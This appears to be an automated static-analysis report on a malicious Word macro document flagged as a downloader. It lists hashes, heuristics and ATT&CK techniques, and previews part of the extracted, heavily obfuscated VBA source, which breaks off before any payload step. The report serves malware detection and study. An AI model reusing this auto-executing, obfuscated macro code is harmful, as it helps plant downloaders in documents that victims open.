Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fe69570cfe43c056…

MALICIOUS

Office (OLE)

189.0 KB Created: 2020-10-22 09:38:00 Authoring application: Microsoft Office Word First seen: 2021-11-03
MD5: 97008a311e0de846bd0e24b9e4f65347 SHA-1: 91edd766807abca9d1d3a9ce27152d19942df0e1 SHA-256: fe69570cfe43c056f36d0a40929d53d4532cd181924613bda7436913979c33cb
202 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initiating malicious actions upon opening. Heuristics indicate the use of CreateObject, suggesting the execution of arbitrary code. The ClamAV detection name 'Doc.Downloader.Logan-9781905-0' strongly implies a downloader functionality, likely to fetch and execute a second-stage payload. The obfuscated nature of the VBA code further supports this assessment.

Heuristics 6

  • ClamAV: Doc.Downloader.Logan-9781905-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Logan-9781905-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18825 bytes
SHA-256: da30aa94b28f995ffc9559eca817f363ffff3144f68117c4ed25ccf38eb07712
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "A0qw88jfmftj"
Function A3j299fve06lt5(Ck5bsno1zt6awrt)
On Error Resume Next
   Set ysTFeT = VhmwHC
Dim gDdmQGIOB(8 + 8 + 1 + 4) As String
gDdmQGIOB(QAplHkeJG) = (793 + 6)
XkaRA = iFHED
gDdmQGIOB(QAplHkeJG) = (eCYTAhBPC + 6475)
gDdmQGIOB(QAplHkeJG) = (5 + 99 + tNPPGEA)
Set GfnHk = sOKDC
Dim iVwUl(6 + 6 + 1 + 8) As String
iVwUl(ihDsFFSJA) = (8714 + 3010)
sAPoBA = nQjyzfCCc
iVwUl(ihDsFFSJA) = (RRcDYbID + 9392)
iVwUl(ihDsFFSJA) = (5 + 888 + UceADHfrB)
Set hxKakJ = tCAbIEd
Dim EQBZlAGFy(6 + 7 + 1 + 8) As String
EQBZlAGFy(goptn) = (9 + 6794)
YHxkhHBFp = nXJpG
EQBZlAGFy(goptn) = (yyNTWpBA + 4)
EQBZlAGFy(goptn) = (6 + 25 + DSSbGBIC)
A3j299fve06lt5 = Join(Ck5bsno1zt6awrt, Wbyxeyx9p0p)
   Set wdRjjJQF = ssDwDNdK
Dim QrPpxWD(7 + 6 + 1 + 6) As String
QrPpxWD(TVmUC) = (37 + 46)
jMoTBT = QNmKFJJ
QrPpxWD(TVmUC) = (PApkUG + 906)
QrPpxWD(TVmUC) = (940 + 129 + rMmzJEG)
Set UnZuRinn = BaUIFI
Dim QCWGc(6 + 8 + 1 + 7) As String
QCWGc(HSADYuI) = (7 + 7)
KbIomNBFq = DmOJFCPSA
QCWGc(HSADYuI) = (AOYXO + 33)
QCWGc(HSADYuI) = (3 + 154 + FKGCJoAJ)
Set uxfmILHuB = XsUjBHJ
Dim CKTMEH(6 + 5 + 1 + 5) As String
CKTMEH(cJKjKAY) = (3587 + 8)
gFeBEEOHI = lVzkInJB
CKTMEH(cJKjKAY) = (WlrbJH + 361)
CKTMEH(cJKjKAY) = (95 + 887 + LxaeC)
End Function
Function Xxu9xp67tuoeumtl(Acdp6rpmgq6prk50)
On Error Resume Next
   Set jIdgIA = gysoDFU
Dim JHRaBF(6 + 6 + 1 + 8) As String
JHRaBF(lQQGp) = (6 + 48)
dwdaOiH = aUIhAGSF
JHRaBF(lQQGp) = (KQAFIF + 5)
JHRaBF(lQQGp) = (63 + 8 + xaNQAOf)
Set bfOIkvC = VweUI
Dim KbDJH(8 + 6 + 1 + 5) As String
KbDJH(WyWjnXAPC) = (26 + 8)
pGnIE = tmmZR
KbDJH(WyWjnXAPC) = (gNtGlGD + 2)
KbDJH(WyWjnXAPC) = (3 + 768 + bwBXCnDF)
Set zFPoAU = QdqpGGY
Dim mUMutMmBE(8 + 5 + 1 + 4) As String
mUMutMmBE(MFIQc) = (3 + 506)
vSfDHJpAD = shHmTdByC
mUMutMmBE(MFIQc) = (RQSQY + 5258)
mUMutMmBE(MFIQc) = (7 + 326 + YAiiGGaIw)
Set Xxu9xp67tuoeumtl = CreateObject(Acdp6rpmgq6prk50)
   Set PnJNGD = HuzlVT
Dim QSGkhYDl(6 + 5 + 1 + 7) As String
QSGkhYDl(xVlti) = (1457 + 103)
wloMAFbD = mlVcLJE
QSGkhYDl(xVlti) = (UdjVcDI + 579)
QSGkhYDl(xVlti) = (1806 + 8 + paCtQ)
Set UyQuCCIIk = XdnLHK
Dim WyoYoGAI(7 + 5 + 1 + 7) As String
WyoYoGAI(ucsIGp) = (8 + 7)
hYWDo = zBEQaB
WyoYoGAI(ucsIGp) = (uOovD + 4)
WyoYoGAI(ucsIGp) = (1 + 8 + rQraB)
Set mdLTHS = rdLckC
Dim WSIcIEFT(6 + 8 + 1 + 7) As String
WSIcIEFT(cVtEIGBJ) = (8 + 3713)
vgHgDxkCH = nwFVA
WSIcIEFT(cVtEIGBJ) = (mamvGHGZx + 763)
WSIcIEFT(cVtEIGBJ) = (4 + 1 + InoiHi)
End Function
Function Wb5ececqr26b(U0wuyrvvt463)
On Error Resume Next
   Set xEREA = zNfVpACZJ
Dim QGBcEIC(8 + 7 + 1 + 6) As String
QGBcEIC(MCAFCHmQ) = (9271 + 1)
tFaCY = KFhkw
QGBcEIC(MCAFCHmQ) = (IKQxI + 749)
QGBcEIC(MCAFCHmQ) = (1 + 12 + ZeFrs)
Set JsJlu = DSVADGyC
Dim iSEPJ(7 + 6 + 1 + 8) As String
iSEPJ(rxlbDFfQ) = (7 + 4)
qiGkF = DdZSLBJJM
iSEPJ(rxlbDFfQ) = (yQGABD + 16)
iSEPJ(rxlbDFfQ) = (2150 + 4 + WITxQSC)
Set BsOmYj = ukzdIS
Dim SRFEIWGAI(8 + 8 + 1 + 8) As String
SRFEIWGAI(DXGEA) = (637 + 4)
JhpnAP = BTINH
SRFEIWGAI(DXGEA) = (oPGmPafn + 464)
SRFEIWGAI(DXGEA) = (65 + 6811 + GqKvAx)
Wb5ececqr26b = Split(U0wuyrvvt463, "=PO32")
   Set RrkdIHC = FlXQCDFX
Dim IobhFeF(8 + 5 + 1 + 5) As String
IobhFeF(nSOBg) = (5 + 4)
RlWCBRHG = ieDsiDBC
IobhFeF(nSOBg) = (GOqlIF + 3)
IobhFeF(nSOBg) = (2 + 84 + ecQaEyEOR)
Set NeREBDFdt = aJllzA
Dim vOxAQOFBA(5 + 7 + 1 + 6) As String
vOxAQOFBA(xlegt) = (446 + 270)
JYAcBA = SFEcJG
vOxAQOFBA(xlegt) = (EMLUPRRBD + 1)
vOxAQOFBA(xlegt) = (6374 + 1 + IJKBzC)
Set zuzXGxInI = hyrBonVDg
Dim KWghkk(7 + 6 + 1 + 4) As String
KWghkk(mFYenuCr) = (680 + 4)
lvamaHBk = yvGTC
KWghkk(mFYenuCr) = (yryMyA + 9)
KWghkk(mFYenuCr) = (9 + 28 + JnbuiJI)
End Function


Attribute VB_Name = "Xfz7gu6iysst4bk"
Attribute VB_Base = "0{EBE7B244-872C-40E7-A6F5-10D638D9F413}{BAD28B56-127A-4DDF-AE1D-5CADEC5F02F6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Fun
... (truncated)